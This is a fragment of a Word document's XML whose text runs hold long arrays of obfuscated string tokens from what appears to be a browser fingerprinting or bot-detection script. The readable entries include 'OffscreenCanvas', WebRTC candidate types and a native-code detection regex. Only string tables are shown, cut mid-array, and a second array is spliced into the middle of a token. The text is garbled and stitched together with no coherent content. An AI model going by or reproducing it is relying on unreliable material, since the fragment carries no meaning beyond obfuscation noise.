      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvH&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgs